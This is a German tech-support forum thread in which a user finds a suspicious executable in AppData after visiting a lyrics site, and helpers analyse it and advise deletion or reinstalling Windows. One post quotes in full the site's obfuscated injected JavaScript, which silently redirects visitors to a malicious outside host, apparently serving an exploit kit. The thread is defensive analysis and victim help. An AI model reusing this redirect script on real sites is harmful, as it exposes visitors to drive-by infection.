[HaBo]
| Die Problemzone Spinnt der Rechner mal wieder? Stellt eure Fragen hier und es wird geholfen. |
appdata anzeigen
Diskussion: appdata anzeigen im Forum Die Problemzone, in der Kategorie PC Foren; Anzeige hi ich habe vergessen wie ich unter "benutzer" -> "hier benutzername" den ordner "appdata" anzeigen lassen kann. zurzeit ist ...
 |
24.09.10, 16:40
| #1 (permalink) |
| Registriert seit: 19.07.10  Likes: 0 |  appdata anzeigen Anzeige hi ich habe vergessen wie ich unter "benutzer" -> "hier benutzername" den ordner "appdata" anzeigen lassen kann. zurzeit ist es unsichtbar. betriebssystem: win 7 alles klar ich habs nun wieder in dem ordner appdata gibt es nun einen ordner namens "Roaming" und in diesem ordner ist ein anderer ordner der "Urzu" heißt und in diesem ordner befindet sich eine datei die "usnyt" heißt. eine anwendungsdatei. was macht das denn auf meinem rechner!? und was genau ist das? als ich eine seite besuchte kam plötzlich eine meldung von meiner firewall und von spybot - search and destroy. die firewall fragte ob ich einen zugriff auf diese seite zulassen möchte. hab zur sicherheit einfach mal auf "abbrechen" statt auf "zugriff zulassen" geklickt. und spybot search and destroy fragte etwas ähnliches. dort hab ich mal auf "verweigern" geklickt. der pc wollte plötzlich irgendwelche einstellungen oder so was vornehmen (denke ich) als ich die seite besuchte. hat die seite mir ohne dass ich es wollte eine datei geschickt? ich wollte nach einem songtext schauen so kam ich auf die seite. das ist der link qskxpvq.angelfire.com das ist jetzt der allgemeine link zu der seite ich kann auch den genauen link geben.. also quasi den mit dem songtext falls nötig. Geändert von Keisuke (25.09.10 um 09:51 Uhr) |
|  |
|
24.09.10, 18:22
| #2 (permalink) |
| Member of Honour   Registriert seit: 04.10.01   Likes: 42 | Lass mal bitte den Spybot MalWare-Scan durchlaufen. lG
__________________ << Wir leben bereits im morgigen Gestern, doch vom gestrigen Morgen sind wir noch weit entfernt. >> << Träume sind Schäume. Es liegt an dir ob du sie lebst oder ein Schaumschläger bist! >> << Erst wenn man beginnt zu implizieren, wird man merken, dass einem sowieso keiner richtig zuhört. >> |
|
| |
| HaBOT | - Anzeige - |
|
|
24.09.10, 18:26
| #3 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | habe bereits direkt nach dem besuch der seite meinen rechner mit spybot und avira gescannt avira fand nichts aber spybot fand viele verfolgende cookies, die aber inzwischen entfernt worden sind. mit ccleaner bin ich auch mal einfach rübergegangen und mein hijackthis log hab ich auch bereits gepostet und warte nun auf eine antwort. |
|
| |
|
24.09.10, 18:45
| #4 (permalink) | |
| Member of Honour  Registriert seit: 22.02.07 Likes: 77 | Zitat:
bei wilden Zeichenfolgen als Subdomain wäre ich IMMER sehr vorsichtig... und wenn du mal nach dieser URL googelst, findest du lauter URLs wie "qskxpvq.angelfire.com/celebrities-without-make-up-tv.html" oder "qskxpvq.angelfire.com/child-models-toplist.html", die nach Viren-Schleuder schreien... Tipp: such dir eine seriösere Seite für Lyrics. z.B.:
btw: gib mal bei Google site:qskxpvq.angelfire.com ein und lies einfach in den Google-Treffern dieses wunderbar computer-generierte Kauderwelsch...  Daran siehst du also, dass keinerlei sinnvoller Content auf dieser Seite existiert - die Seiten sind nur dazu da, um bei Google bei verschiedensten Treffern gefunden zu werden... und wer macht sowas? richtig: jemand, der dir böse Tierchen unterschieben will... | |
|
| |
|
24.09.10, 18:59
| #5 (permalink) |
 Registriert seit: 30.01.10 Likes: 1 | Ich würde die Seite nicht besuchen. Da wird eine JavaScript-Datei von einem russischen Server eingebunden: Code: document.write('<img src="/xMZa.jpg" id="pbZGANeQnn">');
function OAL0eP (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
function xaG1QkU(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0)
{
offset = cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1)
{
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
function hQxFm9(obj, evType, fn){
if (obj.addEventListener){
obj.addEventListener(evType, fn, false);
return true;
}
else{
if (obj.attachEvent){
var r = obj.attachEvent("on"+evType, fn);
return r;
}
else {
return false;
}
}
}
function svQUbrOEV6()
{
OAL0eP("cjvyFuRXH1","ubGNzzDhK2");
}
function NbflM7()
{
svAUMxooc4 = svAUMxooc4+1;
if (svAUMxooc4 >= 13 && svAUMxooc4 < 957673)
{
ctXMAJIvJO3();
}
}
function vdfvfv(){
var url="http://quick-stats.info/january/03";
var gif = document.createElement('A');
gif.href = url;
document.body.appendChild(gif);
var e=gif;
if (e.click) e.click();
else if (e.onclick) e.onclick();
else if (e.href) location.href=e.href;
}
function ctXMAJIvJO3()
{
var RBSdm5 = xaG1QkU("cjvyFuRXH1");
if (RBSdm5 == "ubGNzzDhK2" && rumYduWGi8.width > 7 && rumYduWGi8.height > 5)
{
svAUMxooc4 = 957674;
vdfvfv();
}
}
var svAUMxooc4 = -3;
rumYduWGi8 = document.getElementById("pbZGANeQnn");
hQxFm9(rumYduWGi8, 'error', svQUbrOEV6);
hQxFm9(document.body, 'mousemove', NbflM7);
hQxFm9(window, 'mousemove', NbflM7); Auf jeden Fall steckt ein Teil der Malware im FavIcon der quick-stats.info-Webseite, und so wie das aussieht, würde ich spontan mal auf ein Exploitkit tippen (werde ich die Tage mir mal genauer anschauen). Vorsorglich habe ich auch 2 Abuse-Mails rausgehauen. Da der Server aber in Russland steht, bin ich mal gespannt, ob was dabei rumkommt.
__________________ Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. - Rick Cook - |
|
| |
|
24.09.10, 19:41
| #6 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | hab ich jetzt also einen virus auf meinem pc? avira hat nichts gefunden und mit spybot hab ich auch bereits alle funde gelöscht bin ich wieder sicher oder sollte ich noch mehr tun? und hier will jemand dass ich ihm die datei "usnyt" im ordner "Urzu" schicke ist das denn nun überhaupt ein virus? |
|
| |
|
24.09.10, 20:23
| #7 (permalink) |
| Registriert seit: 30.01.10 Likes: 1 | Ob die Datei nun wirklich Malware enthält oder nicht, wird dir ohne genauere Überprüfung niemand sagen können. Um zu überprüfen ob die Datei bekannte Malware enthält, kannst du sie ja mal bei www.virustotal.com hochladen. Dort wird die Datei mit allen gängigen Virenscannern überprüft. Aber selbst wenn nichts gefunden wird, besteht immernoch die Gefahr, dass die Malware modifiziert wurde oder relativ neu und unbekannt ist, sodass die AV-Hersteller davon noch nichts mitbekommen haben. Der Pfad an dem die Datei liegt und der Ordner- und Dateinamen würden mich auf jeden Fall sehr sehr stutzig werden lassen. Eine Windows-Datei oder eine Datei von gängigen Programmen ist es aller Wahrscheinlichkeit nach nicht.
__________________ Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. - Rick Cook - |
|
| |
|
24.09.10, 20:38
| #8 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | unter "eigenschaften" steht "erstellt: Mittwoch, 1. September 2010, 22:58:28" also hab ich das schon länger? naja ich glaub das bedeutet nicht gleich dass ich es seit dem 1. 9. hab. die seite hab ich heute besucht aber ich kann mich noch erinnern dass spybot mir berichtete dass auf "usnyt" zugegriffen werden möchte. also kommt das doch höchstwahrscheinlich von dieser seite gut ich schicke dir die datei mal rapidshare? muss ich die datei vorher in ein rar-archiv packen? wenn ja, wie geht das? |
|
| |
|
24.09.10, 20:44
| #9 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | unter "eigenschaften" steht "erstellt: Mittwoch, 1. September 2010, 22:58:28" also hab ich das schon länger? naja ich glaub das bedeutet nicht gleich dass ich es seit dem 1. 9. hab. die seite hab ich heute besucht aber ich kann mich noch erinnern dass spybot mir berichtete dass auf "usnyt" zugegriffen werden möchte. also kommt das doch höchstwahrscheinlich von dieser seite gut ich schicke dir die datei mal rapidshare? muss ich das vorher in ein rar-archiv packen? wenn ja wie geht das? |
|
| |
|
24.09.10, 20:45
| #10 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | oh sorry jetzt hab ich es zweimal gepostet |
|
| |
|
24.09.10, 20:48
| #11 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | ah ok habs nun hochgeladen |
|
| |
|
24.09.10, 22:56
| #12 (permalink) |
| Registriert seit: 30.01.10 Likes: 1 | Ich habe die Datei erhalten und einen kurzen Blick darauf geworfen. Die Datei ist nicht signiert und so ziemlich alles daran sieht generisch aus. In meiner VM verweigert die Datei aber ihren Dienst, das Programm beendet sich kurz nach dem Start immer wieder. Zuerst hat es sich scheinbar daran gestört nicht mit Adminrechten ausgeführt zu werden. (Zur LSA gepiped und als eingeschränkter User hat es sich wortlos beendet). Nun wird es in dem Administrator-Account ausgeführt, aber es beendet sich immer noch...  Außer dem LSA-Zugriff machen mich noch die WinAPI-Zugriffe etwas stutzig: Code: kerberos:/data/share# strings usnyt.exe | grep Create CreateProcessA CreateFileW CreateEventW HeapCreate CreateFileA kerberos:/data/share# strings usnyt.exe | grep Load LoadResource LoadLibraryA Übersicht aller getätigten WinAPI-Aufrufe: und die dafür eingebundenen Bibliotheken: Ich schau mal ob ich am Wochenende Zeit finde, mir das Ding im Debugger anzuschauen. Aber ich die Hoffnung, dass sich doch noch etwas Gutes in dieser Datei schwindet dahin...
__________________ Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. - Rick Cook - Geändert von Dresko (24.09.10 um 23:17 Uhr) |
|
| |
|
24.09.10, 23:02
| #13 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | und was mach ich jetzt solange mit der datei?  hast du meine nachricht gelesen? |
|
| |
|
24.09.10, 23:17
| #14 (permalink) |
| Registriert seit: 30.01.10 Likes: 1 | 2 Virenscanner bei Virustotal meinen etwas gefunden zu haben: http://www.virustotal.com/file-scan/...f80-1285362006 AntiVir beschwert sich, weil die Datei mit einem verdächtigen Packer modifiziert wurde (u.a. um nicht von Virenscanner erkannt zu werden) und Sunbelt glaubt einen generischen Trojaner gefunden zu haben. Nach dem sie nicht signiert ist und generisch erzeugt wurde, aber in großem Umfang in Windows herumfuhrwerkt, und schon 2 Virenscanner anschlagen, würde ich sie zumindest mal löschen. Wenn du dem Rechner nicht mehr vertraust, formatier die Festplatte und spiel Windows neu auf. Eine 100%-ige Garantie, dass dein Rechner virenfrei ist, wird dir hier niemand geben können. Ich kann dir auch nicht sicher sagen, ob du nun wirklich infiziert bist. Höchstens vermuten kann ich es. Aber zum Glück ist ja gerade Wochenende und eine Formatierung und Neuinstallation dauert in der Regel auch nicht länger als 1-2 Stunden. 
__________________ Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. - Rick Cook - |
|
| |
|
24.09.10, 23:25
| #15 (permalink) |
| Themenstarter Registriert seit: 19.07.10 Likes: 0 | omg schon wieder dieser stress kann ich die datei nicht einfach löschen und gut ist? kann ich meine dateien auf eine externe festplatte ziehen oder muss ich angst haben dass meine externe festplatte dann auch infiziert wird? |
|
| |
|
| - Anzeige - | |
|
|
[HaBo] » PC Foren » Die Problemzone » appdata anzeigen
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
